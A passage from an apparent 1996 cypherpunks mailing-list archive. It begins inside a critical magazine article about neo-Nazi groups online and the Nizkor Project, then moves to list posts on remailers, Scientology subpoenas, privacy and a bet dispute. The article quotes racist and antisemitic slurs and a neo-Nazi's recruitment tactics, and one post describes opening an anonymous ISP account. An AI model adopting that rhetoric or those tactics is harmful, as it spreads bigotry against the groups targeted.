Kleim argues: "Boobus Americanus does NOT operate rationally; he has no
opinion, and cannot form an opinion independent of the Jewsmedia. The ONLY
thing that can 'convert' Boobus Americanus is more and more Negro crime, less
and less jobs, greater and greater hardships of all kinds. Joe Sixpack will
do absolutely nothing until the flow of his beer ends. The average American
moron must be FORCED to think, and no amount of racist propaganda concealed
Buchanan-style in patriotic wrappers will make the masses consider 'the
Truth.'"

A "White Nationalism FAQ" (frequently asked questions) on Stormfront proposes
creating separate nations for whites and non-whites, to spare whites from
continuing exploitation through racial-preference schemes in hiring,
university admissions, and government contracting. The FAQ's author, using
the Norse-mythology pen name Yggdrasil, suggests ceding land already occupied
by non-whites. Whites-only areas, however, would still welcome Asians. (The
only ones with much to fear, evidently, would be white liberals: "Those who
are guilty of 'integrationism' should do the sensible thing and flee. It will
spare us all a lot of pain.")

Milton Kleim, by contrast, sees a different future: "The United States of
America, the Confederate States of America, Canada, and Quebec would be
unified into one Nation-State, perhaps known as the Aryan Confederation."
Local government would operate with elected officials, "but the present
ridiculous parliamentary game in national politics would be replaced with
frequent referenda for important issues."

Kleim would follow a "live and let live" policy with nations like Japan and
Iraq. "Belligerent actions of those governments violently opposed to us, such
as the criminal State of Israel, or the menace to the world called China,
would be countered with equal force, up to and including total utilization of
America's strategic forces."

The Ultras have suffered everything from jail sentences to e-mailed death
threats, but appear determined to carry on. Critics may damn their
anti-Semitism, mock their paranoia (one Ultra wondered whether Stormfront
were a government-run trap), and dismiss their "facts" as exploded fantasies.
Outsiders may wonder why Ultras are going to so much trouble for "Boobus
Americanus" whites who are mere "sheeple" even if they are, technically,
Aryans. Nevertheless, half a century after the defeat of Nazism, something in
its worldview appeals to them. And just as the Nazis used the new media of
radio and film, their spiritual descendants are using the Net to spread their
message.

The case of Toronto's Ernst Zundel shows how technically hard it is to
suppress that message. Spreading neo-Nazi views is illegal in Germany, so
when Zundel set up his own website recently, the German government tried to
close German Netters off from access to it. Several other Net servers
(computers directly linked to the Internet) promptly established "mirror"
sites that Berlin would find it much more awkward to close off--such as
university campuses. Like the hydra, unpopular propaganda can grow more heads
each time one is cut off.

This is not to say that mirror sites at American and Canadian universities
portend a neo-Nazi trend on campus--only that the logic of free speech means
supporting it especially in the cases of those we may not only oppose but
detest. It also means considering whether Canadian laws against "hate speech"
and "false news" may be intrinsically oppressive, however well-intended.
(Even when such cases fail, the prospect of court action, like "libel chill,"
may keep some people from expressing unpopular views.)

One response strategy, adopted by the Simon Wiesenthal Center, is to promote
an "acceptable use" code for persons and organizations providing Net access.
This amounts to a refusal to take the money of Ultras wanting to purchase
such access. It could also include refusing to provide access to
Ultra-oriented newsgroups like alt-skinheads and alt.revisionism. Such
boycotts may make it harder for Ultras, but only until they set up their own
servers--as they have already done in several cases.

Others echo the German government's desire simply to ban Ultras from the Net
altogether. Twenty years ago, Graham Forst founded the Vancouver Standing
Committee on the Holocaust. Since then the Committee has brought together
survivors of the Holocaust with 40,000 high school students from B.C.,
Washington state, and Alberta--including some of Jim Keegstra's
students.[Until he was fired in the 1980s from his job as a high-school
teacher in Eckville, Alberta, Keegstra had taught anti-Semitism to his
students.] Forst rejects the idea that Holocaust denial deserves the same
right to expression enjoyed by those who debate details of the Holocaust.

"Holocaust denial is not a 'position' of any kind," he says, "but is simply
and unequivocally an expression of anti-Semitism." Forst argues that deniers
are no more exercising "freedom of speech" than they would be if they
disrupted a meeting by speaking in imaginary tongues, or by screaming. "Why,"
he asks, "should such a person be allowed a place at the table?"

In Forst's view, "The Holocaust is denied for one reason only: to cause pain
to those vicitmized by the worst eruption of racial hatred in history, not to
contribute to any free exchange of ideas. Deniers are anti-Semites hiding
behind high principles to sanitize Nazism and prepare for its return; in my
opinion, such a nefarious intention requires the 'discussant' to be quickly
and unceremoniously thrown out of the room." But as experience has shown,
it's impossible to throw anyone permanently off the Internet.

The Ultras, of course, consider all the attacks as just a cost of doing
business--and their business is recruiting. They know their potential
supporters are few and scattered. The Net brings them together, encourages
them, and provides them with a community. Yet they seem to have no program
for acquiring power.

Milton Kleim says: "Since we have no idea what the future holds, there has
been little speculation about what will transpire to bring about an 'Aryan
Confederation.' It will certainly be via 'unconventional' means, but it is
impossible to assume a certain course of action will be followed when
inevitable chaos ensues."

Kleim's strategy for recruitment through Usenet newsgroups is clear and
frank: "Except on 'our' groups, avoid the Race Issue. Side-step it as much as
possible. We don't have the time to defend our stance on this issue against
the comments of hundreds of fools, liars, and degenerates who, spouting the
Jewish line, will slaughter our message with half-truths, slander, and the
ever-used sophistry. Avoid engaging in non-productive debates with enemy
activists. It is often difficult to distinguish between the Enemy's dedicated
lackeys, and the misguided who are merely parroting what the Jewsmedia has
taught them."

Kleim is keenly aware of being monitored: "WARNING: Be aware that EVERYTHING
you post will be seen by the Enemy. All of your posts may be catalogued and
archived for future use by the Enemy, either by self-appointed 'Net police'
like the notorious Ken McVay, or by lurkers from the so-called
'Anti-Defamation League' and the 'Simon Wisenthal Center.'

The above-mentioned McVay is doing a great deal to earn his notoriety among
the Ultras and to keep their community from growing. McVay, a 55-year-old
transplanted American (now holding dual US-Canadian citizenship)lives on
Vancouver Island. He'd been a World War II buff when he was younger, and when
he began to run across Ultra propaganda on the Internet--especially Holocaust
denial--he went back to his books to try to refute the Ultras' version of
history.

Out of the "flame wars" he fought online during the early 1990s emerged the
information equivalent of a gigantic weapons dump: The Nizkor Project.
Created by McVay and his supporters, Nizkor is a Web site that is also an
immense archive. It includes detailed refutations of common Ultra assertions
(for example, that the concentration-camp gas chambers were nothing of the
sort), and much more. McVay has included detailed dossiers on many Ultras,
storing the messages they have sent to various newsgroups over a period of
years. Also included are such documents as the complete judgement in Jim
Keegstra's original hate-crime trial.

The first of Nizkor's goals is to forestall the Ultras' efforts to discredit
democratic government--as they do, for example, in speculating that the
Oklahoma City bombing was actually a US government plot. Second, by tracking
and responding to Ultra posts, Nizkor sustains a documented debate rather
than allowing Ultra assertions to go unchallenged.

The third goal is probably the most important: "To foster a critical frame of
mind which will help to protect the unwary from the deceit of hate
propaganda." Although he once supported the idea of suppressing Ultra
propaganda on the Net, McVay now sees documented argument as the best
response to it.

"It was a gradual change," he says,  "over perhaps a year... and it was
UseNet, and the Internet, that changed my mind. I came to understand that the
key to dealing with insidious racism is through education. Suppression does
not provide a cure,although it may be satisfying for a short time -- all it
serves to do is drive the problem underground."

Graham Forst doesn't agree with McVay's new attitude, but feels Nizkor is the
only practicable way to counter Ultra propaganda. And while McVay is on the
Ultras' side of the free-speech issue, they don't seem especially grateful.
Don Black says he feels "amused and flattered" by the attention he gets from
Nizkor, and Digital Freedom's Marc Lemire says the project helps propagate
his viewpoint.

"McVay does, to a certain degree, advance our cause," Lemire says. "He offers
all our messages on one site. An inquisitive person can log in and read what
we have said over the past years. Which, of course, helps us. I personally
consider McVay as a childish reactionary. In one of the first messages I ever
received from him, he claimed I wear diapers and was an idiot. His
information is generally inaccurate and outdated."

Kleim echoes Lemire's claims and also soft-pedals Nizkor's effect: "Actually,
we consider McVay a nuisance, like the common house fly, rather than a real
problem.  He has done us more good than harm.  Many sympathetic people have
'discovered' us by perusing his archives. * Most people don't care about what
McVay is peddling. Only certain segments of society, Jews, political
agitators of the ultra-left like 'Anti-Racist Action,' and allied groups,
give a hoot about what McVay and his friends are doing."

McVay, in turn, doesn't care what Lemire and Kleim say: "I am not doing this
to change Milton Kleim's mind. I am doing this because millions of people
know next to nothing about the Holocaust, and the ugly racism which denies
it. It is all, sadly, ancient history to most of the population. They are
not, however, indifferent - - they read, they query, and they learn to
determine the truth for themselves."

On the evidence of some posts, not all Ultras are as dedicated to free speech
and legal action as they claim. In "Stormfront-L," a listserv run by Don
Black, a Canadian sympathizer recently proposed a scenario "in which we
assume power democratically, but then keep it. The only problem with this
would be the necessity to combat opposing ideas to prevent an uprising. This
would impinge on our right to 'Free Speech' that we hold so dear."

Another Ultra responded: "Yes, I believe that certain 'rights' that are now
available would probably not be so in a fascist state. However, I am not
interested in preserving 'Free Speech' as it is defined today, I am
interested in preserving the Aryan race."

McVay recently reported an attempt by an Ultra supporter to "mail-bomb" his
Internet server, swamping the computer with unwanted messages. (The
mail-bombing failed and the Ultra lost his own computer account.) He also
argues that Ultras like Ernst Zundel support free speech only when it suits
them.

McVay says he does not intend to abandon his efforts against the Ultras. "Me?
I'm in this for life. These guys offend me deeply. The public needs to
understand that the Internet is borderless and near-indestructible. It is the
one place on earth where you can educate tens of millions --billions, in
years to come -- it is a tool for the racists, yes, but I have seen ample
evidence that it is a far more powerful tool for those dedicated to fighting
racism."

Journalists reporting on this issue face an ethical issue also. No doubt such
articles would stir some interest in Ultra organizations and views,
increasing the 200,000-plus Stormfront "hits" (log-ins to its web pages and
files) already counted in the past year. Some may join Ultra groups as a
result. But readers will also look in on Nizkor, which is not exactly
neglected. Last June Nizkor was counting 33 visitors a day but this February
it recorded 532 daily visitors--117,768 hits on its various files in that
month alone.

Neither side is going to go away, and many people are going to continue to
push for the silencing of the Ultras. Some will argue that the best way to
fight them would be to ignore them. They might invoke the German poet
Friedrich von Schiller's famous line: "Mit der Dummheit kampfen Gotter selbst
vergebens." ("Against stupidity, the gods themselves struggle in vain.")

The most dangerous ideas, though, are those that go unchallenged. The Ultras
do everyone a favour, however unwelcome and unasked-for, by questioning the
very premises of democracy and equality. If nothing else, they should make us
reconsider our dependence on hate laws which suppress debate rather than
promote it--and which actually promote Ultra goals by publicizing people like
Ernst Zundel and Jim Keegstra.

John Dixon, a philosophy instructor at Capilano College and a member of the
executive of the B.C. Civil Liberties Association, says all hate-propaganda
laws should be repealed. "Immigration policies, race relations, the Holocaust
-- these are all legitimate topics for discussion and debate by a democratic
citizenry; that is, if you believe, as civil libertarians do, that a
genuinely democratic citizenry must have the freedom to communicate with one
another about any and all matters of political consequence."

McVay and the Nizkor Project, in turn, challenge the Ultras to document their
assertions or lose the debate; significantly, the Ultras prefer to make
personal attacks on McVay as a hireling of the Jews who is in the anti-Ultra
business only for money from sympathetic Jewish organizations.

Some may wish Ken McVay would shut up and quit giving the Ultras the
attention they desire. But "Nizkor" is Hebrew for "We will remember."
Remembrance is brief if not shared. And as Santayana observed: "Those who
cannot remember the past are condemned to repeat it."

-30-

Sidebar:

Web Addresses

Stormfront: http://stormfront.wat.com/stormfront/

This provides access to a great many other Ultra pages in the US, Canada and
Britain.

Nizkor Project: http://www.almanac.bc.ca

Nizkor also provides links to some Ultra sites as well as anti-Ultra groups.

Vancouver Progressive Home Page: http://www2.portal.ca/~comprev/

This site links with many anti-racist groups.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 22 Apr 1996 11:34:07 +0800
To: cypherpunks@toad.com
Subject: Anonymnity at teleport
Message-ID: <01I3T84SPUOW8Y4Y84@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	A bit of interesting information about teleport. Still not as good
as c2 (as I stated), but it's still good to have multiple anonymous account
providers around... whether or not they mean to be anonymous. This is from a
sysadmin type there (why I deleted the name) who I'll ask about the Majordomo
patch.
	-Allen

>>Our users can have a P.O. Box as their address (or a false address),
>>whatever they want as their 'real name', and can pay for their accounts by
>>mailing in cash. All they need to do is be close to a phone that isn't
>>theirs for an hour or so.
>
>>The can put in a phone# when they set up, then call in from that phone (even
>>if it isn't their own) and have one of us call them back with a few
>>minutes...all set.
>
>>Can't get any more anonymous than that.
>
>>Of course it *is* against the rules.
>
>	The reason that I'd take your name off, yes. Also a reason not to be as
>trusting... since it is against the rules at teleport, you're more likely to
>cooperate than Sameer is if the feds or someone want to know who the anonymous
>person is. Sameer makes quite sure he doesn't _have_ any information to give
>such types.... including log files of telnet sessions.

True, but a log file without a name, address, phone# or SS# to attach to it
is worth *very* little.... :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 22 Apr 1996 09:55:15 +0800
To: mirele@xmission.com
Subject: Re: Scientology harassing anon.penet.fi again!
Message-ID: <01I3T9KG3X588Y4Y84@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I've got someone (Phil Agre) who wants to forward the scientology
stuff (i.e., on their potential troubling of anonymous remailers et al)... _if_
he can avoid any legal problems by doing so. Any legal opinions on what that's
been posted on cypherpunks he _can_ forward without the likelihood of legal
hassles?
	Thanks,
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 22 Apr 1996 10:01:39 +0800
To: cypherpunks@toad.com
Subject: GAW_ker
Message-ID: <199604212212.SAA11991@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Security Management, published by the American Society for
   Industrial Security, has two articles on computer security
   in its April, 1996, issue:

   "Legal Lessons in the Computer Age," by Mark D. Rasch,
   J.D., director of information security law and policy with
   SAIC, and former DoJ prosecutor of Robert Tappan Morris. A
   tabloid on tabloiding computer crime to hacker-phobics.

      This snapshot of current law and court rulings gives
      security professionals a glimpse into the evolving legal
      landscape that companies must be prepared to negotiate
      when pursuing those who might attempt to steal or damage
      computerized systems or information. (30kb)

   "E-Mail Policy By the Letter," by Fred L. Trickey, an
   information security officer at Columbia University. An
   account of good e-mail policies and procedures, with
   salient references, and a sidebar on E-mail gawking.
   (24kb)

   GAW_ker (for both)

   -----

   For info on security management see:

      http://www.securitymanagement.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 22 Apr 1996 13:10:22 +0800
To: cypherpunks@toad.com
Subject: Re: Was the clause for Biometric ID Cards dropped?
Message-ID: <v02120d19ada09b665bb8@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 17:12 4/21/96, E. ALLEN SMITH wrote:
>        As the subject line says, was the proposal for Biometric ID Cards
>dropped? I saw something about it on here and forwarded it; my respondent
>(Phil Agre of the RRE news service) says he thought that clause had been
>dropped.

If it passes this year, next year, or five years from now, pass it will.
With the customary >90%. Presumably after a suitable Reichstag Brand.



Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Mon, 22 Apr 1996 11:40:50 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU (E. ALLEN SMITH)
Subject: Re: Scientology harassing anon.penet.fi again!
In-Reply-To: <01I3T9KG3X588Y4Y84@mbcl.rutgers.edu>
Message-ID: <199604212340.TAA08738@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain



I'm sure within hours of reading this message, you'll be inundated with
requests to have Phil "send me the stuff and I'll post it". The net is
full of people to whom a letter from Helena Kobrin [CoS attorney] is
like a Medal of Honor, who would be happy to relieve Phil of liability
by posting the material themselves.

-- 
http://yakko.cs.wmich.edu/~frogfarm  ...for the best in unapproved information
Tell your friends 'n neighbors you read this on the evil pornographic Internet
"Where one burns books, one will also burn people eventually." -Heinrich Heine
People and books aren't for burning. No more Alexandrias, Auschwitzs or Wacos.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 22 Apr 1996 13:14:17 +0800
To: cypherpunks@toad.com
Subject: Re: Jim Bell, Apology to list.  Was: [Yadda Yadda Yadda]
Message-ID: <ada035ed07021004ec5a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:44 PM 4/21/96, Black Unicorn wrote:

>All this said, I find Mr. May's and Mr. Sandfort's criticism stinging.  Mr.
>Bell, and my response to him, manages to sap a great deal of time and effort
>from myself and others for no gain aside draining his (and to some extent
>my) reputation
>capital.  These disputes serve little purpose otherwise.  It's clear to

By the way, I certainly was not making a personal condemnation of Uni, or
of Jim Bell for that matter. I was mainly making the point that Sandy's
point about setting up a wager is problematic (in fact, Uni makes the same
points vis-a-vis his view of how Bell might start finagling about the terms
of any bet--this was in fact seen during the Extropians experiments, and is
what I meant when I said that more time would be spent debating the
bet....).

I admit that I once I wrote the word "the Unibells" (Uni + Bell, of
course), I liked the ring of it (:-}) and used it for the thread title as
well.

I was serious that I deleted unread the Bell/Unicorn rants; I suspect
nearly all others do as well, so their time spent on these messages these
last several weeks was even more of a waste.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 22 Apr 1996 15:49:48 +0800
To: Brad Dolan <shamrock@netcom.com>
Subject: Re: Smartcards are coming to the US
Message-ID: <2.2.32.19960422024309.00a7ef74@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:15 PM 4/21/96 -0400, Brad Dolan wrote:
>Saw a CNN story Friday about an interesting special debit card 
>application in Mexico.  They're being issued to poor Mexicans, who can 
>use them to buy tortillas and a few other foodstuffs.  The cards are tied to 
>a behavior-control database and failure to send kids to school, get 
>mandatory medical exams/treatments/vaccinations, etc. results in card 
>deactivation.

Interesting method of social control.  "Do anything we don't like and we
revoke your ability to spend money through government approved outlets."

What a Brave New World we live in...
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 22 Apr 1996 14:55:40 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Jim Bell, Apology to list.  Was: [Yadda Yadda Yadda]
In-Reply-To: <Pine.SUN.3.91.960421084606.11213A-100000@crl11.crl.com>
Message-ID: <Pine.SUN.3.91.960421192206.9131E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 21 Apr 1996, Sandy Sandfort wrote:

[...]

> To which Black Unicorn responded: 
> 
> > I have US$ 50,000 that says it didn't.  Care to take me up on it?

[...]

> I would be interested to see if Jim Bell and Black Unicorn could
> engage in a "friendly" wager on the question in point for the
> nominal sum of, say, US$100.  Perhaps they can cooperate to frame
> their dispute in unambiguous terms, mutually agree upon an escrow
> agent and pick a referee or other resolution mechanism to decide 
> their "case."  Wouldn't that be something?
> 
> By the way, gentlemen, I'm not kidding.  Everyone on this list
> could use a respite from all the "yes-it-is-no-it's-not" posts
> among various combatants engaged in "how-many-angels..." spats.

Prediction:  During the terms negotiation phase much backpeddling by Mr. 
Bell will be seen.  This will include a narrowing of the geographical 
scope of the wager, a revival of the debate as to when a new century 
actually begins (00:00:01 Jan 1, 1900 or 00:00:01 Jan 1, 1901), endless 
hand wringing about what exactly an "exemplar" is, and whether he has to 
pay US$ 50,000 on losing, or the amount representing its depreciation 
from the time I made the wager.  (US$ $49,999.997?)

The reality is that Mr. Bell, more often than most people, is speaking 
before thinking.  He pulled his claim right out of the air, which is 
generally the substance of the support for his works.  He does not 
bother to research, (except to cite the constitution) or ground any of 
his discussion in anything like reality.  He backs his claims instead 
with posture and bluff ("How much do you want to bet that...")  This is 
smoke he hopes will solidify into substance for those too lazy to check 
up on him.  (It is worth noting that Mr. Bell has gotten into disputes 
with 4 people (by my limited count) who actually seem to have a clue 
about the subjects they discuss.  Every one of these has been in the 
context of a correction to Mr. Bell's facts or assumptions.  The irony is 
that occasionally he has some good points, which are simply decimated by 
the Yadda Yadda Yadda portions of his work.

All this said, I find Mr. May's and Mr. Sandfort's criticism stinging.  Mr. 
Bell, and my response to him, manages to sap a great deal of time and effort 
from myself and others for no gain aside draining his (and to some extent my) reputation 
capital.  These disputes serve little purpose otherwise.  It's clear to 
me, if not everyone else, that Mr. Bell simply fabricates his positions, 
evidence, and persuasion out of the mist.

I will waste no more time on him unless he makes the most offensive 
errors in legal fact.

He is still quite welcome to stand by the original statement that 
promoted my wager.  I still await an apology for being compared with the 
Nazi oven workers.

With my apologies to the list for not restraining myself sooner -

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 22 Apr 1996 13:31:51 +0800
To: cypherpunks@toad.com
Subject: Re: Smartcards are coming to the US
Message-ID: <ada03b280802100426fb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:06 PM 4/21/96, Lucky Green wrote:
>At 15:15 4/21/96, Brad Dolan wrote:
>>Saw a CNN story Friday about an interesting special debit card
>>application in Mexico.  They're being issued to poor Mexicans, who can
>>use them to buy tortillas and a few other foodstuffs.  The cards are tied to
>>a behavior-control database and failure to send kids to school, get
>>mandatory medical exams/treatments/vaccinations, etc. results in card
>>deactivation.
>
>My first response was: he is making this up. But it shoudn't come as a
>surprise to any reader of this list. Expect to see more of it.

Why should this surprise you? In the U.S. there are _already_ several
programs which are similar to this Mexican example.

For example, "food stamps." Not valid for expenditures on alchohol,
tobacco, and various other disapproved-of consumables. One hand takes away
the tax monies (albeit not from those getting food stamps, as their income
is typically exempt from taxation) and the other hand doles out a special
form of scrip that can theoretically only be spent on approved-of
substances.

Someday--maybe when Perry is out of the country at an IETF meeting--I'll
forward my article about the scandalous plan to privatize the nation's food
stores, thus making food only available to the rich and denying the poor of
their access to the foodstuffs deemed nutricious by the Parent-Grocer
Associations (PGAs) and available at their local People's Public Food
Distribution Centers.

(This was a piece I did in the late 1980s, critiquing the critics of
schools vouchers and private schools by imagining a world in which food
distribution was done at "public stores" and run much the way our public
education is run.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Mon, 22 Apr 1996 12:20:40 +0800
To: cypherpunks@toad.com
Subject: Scientology's fishing expedition mentions remailers
Message-ID: <Pine.SUN.3.91.960421195910.12109B-100000@kolo.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



Biased Journalism [via fight-censroship list] is reporting that Keith
Henson received a Demand For The Production Of Documents and Things from
counsel for the Religious Technology Center [RTC], an arm of the church of
scientology. 

Among the documents to be produced by Mr. Henson:
 
Demand 14.  Any and all documents relating to postings of Advanced
 Technology materials, including, but not limited to, actual postings 
 or discussions of such postings, whether actual or planned, made 
 through the following servers: 
 
 a.      freezone.remailer
 b.      nately.ucsd.edu
 C.      penet.fi
 d.      replay.comm
 e.      utopia.backtic.nl
 
Demand 19.  Any and all documents relating to communications with
 the following individuals relating to the Advanced Technology: 
 
 a.      Alex Dejoode
 b.      Dennis Erlich
 c.      Steven Fishman
 d.      Mike Godwin
 e.      Johan Helsingius
 f.      Jeff Jacobsen
 g.      Tom Klemesrud
 h.      Arnaldo Lerma
 i.      Dierdre Malloy
 j.      Peter Mante
 k.      Ron Neuman
 l.      Robert Penny
 m.      Felipe Rodriquez
 n.      Karin Spaink
 o.      Shari Steele
 p.      Shelly Thomson
 q.      David Touretzky
 r.      Grady Ward
 s.      Lawrence Wollersheim
 
Demand 20.  Any and all documents relating to postings made
 through the following servers: 
 
 a.      freezone.remailer
 b.      nately.ucsd.edu
 c.      penet.fi
 d.      replay.comm
 e.      utopia.hacktic.nI
 
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 22 Apr 1996 14:18:19 +0800
To: cypherpunks@toad.com
Subject: Betting  (Re: [Yadda Yadda Yadda]....)
Message-ID: <ada040ff090210048622@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:28 PM 4/21/96, Sandy Sandfort wrote:

>This is not extropians.  We are more anarchic, less ideological
>and more goal oriented.

I suspect we also delete more messages, too.

By the way, my hunch is that virtually none of us know very well what Bell
and Uni are saying to each other, so who would possibly agree to be the
judge? Maybe Sandy, you will volunteer. Let us know how it turns out, if it
turns out and $100 actually changes hands.

...
>And you like endless cross-talking better?  In any event, the

No, I prefer to delete arguments I have no interest in. This includes Bell
and Uni ranting at each other, or other ranting at each other (and I don't
hold myself blameless here, natch), etc.

My memories of the Extropians experiments were that I deleted most of the
"polycentric law" court cases and "decision duel" wagers. I recall there
were wagers involving Mike Price, Perry Metzger, Tim Starr, Eric Raymond,
and others, though I don't recall what the issues were about, nor who won,
nor if any money was actually transferred on _any_ of these wagers. What I
remember is what James Donald also remembers, that large amounts of
bandwidth got consumed in debates about the terms, about the conditions for
payout, and about weaseling out of judgments. If Harry Shapiro is reading
our list, he can perhaps shed some light on things, as he was a sort of
List Judge and Executioner at the time.


>> At $500, our problem would become much worse, rather than much
>> better.
>
>Here we agree, 100%.


By the way, I recall that bets on the Extropians list rapidly escalated to
"serious" levels. I recall one apparently-serious [see below] bet of
$10,000.

I say "apparently serious" because the bettor did not appear to be joking.
However, it also seemed likely he was using the outrageous size to "bluff"
his opponent into backing down, just as James Donald alluded to. My "bet"
is that the issues in ever formulating such a large bet would ensure that
it never got realized...precisely the desired result of absurdly large
bets. I'll bet $10,000 that no bet of $10,000 or more ever actually gets
settled on this list.

(By "absurdly large" I mean in this context. I have many times placed
"bets" much larger than this on stock market expectations, but not on "bar
bets." Such a bet would never be collected, would in fact be tied up in
waffling, finessing, backing off, dissemmbling, shuffling, and, of course,
would never be collected upon.)

But, again, if Sandy is volunteering to judge, and both Jim Bell and
Unicorn accept him and the terms....well, I won't stop them.

Let me know what happens, but please include a tag like "[Final Bet
Outcome]," as I'll be skipping the likely back-and-forth posturing.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 22 Apr 1996 14:26:34 +0800
To: frogfarm@yakko.cs.wmich.edu
Subject: Re: Scientology harassing anon.penet.fi again!
Message-ID: <01I3TFBYCPYO8Y4YAG@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"frogfarm@yakko.cs.wmich.edu" 21-APR-1996 19:39:01.86

>I'm sure within hours of reading this message, you'll be inundated with
>requests to have Phil "send me the stuff and I'll post it". The net is
>full of people to whom a letter from Helena Kobrin [CoS attorney] is
>like a Medal of Honor, who would be happy to relieve Phil of liability
>by posting the material themselves.

	Umm... he'd like to send it out on a mailing list (the RRE newsletter)
to which only he can post. Plus, it's simply the stuff that was on cypherpunks.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 22 Apr 1996 14:37:17 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU
Subject: Re: Scientology harassing anon.penet.fi again!
Message-ID: <01I3TG0ZTVWW8Y4YAN@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Umm... I'm getting quite a few offers to forward the material in
question; thank you. But it's just the stuff that was on cypherpunks earlier.
And he's wanting to know if _he_ can safely legally (w/regards to the
Scientologists) put it on _his_ mailing list - which isn't a discussion list.
Sorry that it apparantly wasn't clear, although I have no idea how it wasn't.
	Thanks,
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Mon, 22 Apr 1996 13:03:52 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Georgia Legislation - Remailer Effect??? [NOT!]
In-Reply-To: <9604212054.AA03211@outland.ain_dev>
Message-ID: <Pine.SUN.3.91.960421215231.7967N-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Having read the admittedly vague and badly worded statute, I bet you that
an competent court (query whether this includes the first state prosecutor
and trial court that actually are faced with a case) would interpret the
act to apply only to cases where someone infringes on the intellectual
property of another.  If only to avoid constitutional problems. 

Although as a formal matter EFF are right that the bill's language *could* be
read to apply to all anonymous communication, I don't think EFF has done
us a favor by whipping up panic, because it seems to me relatively unlikely 
that it *should* or *would* be read that way.  

Oh well.  

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
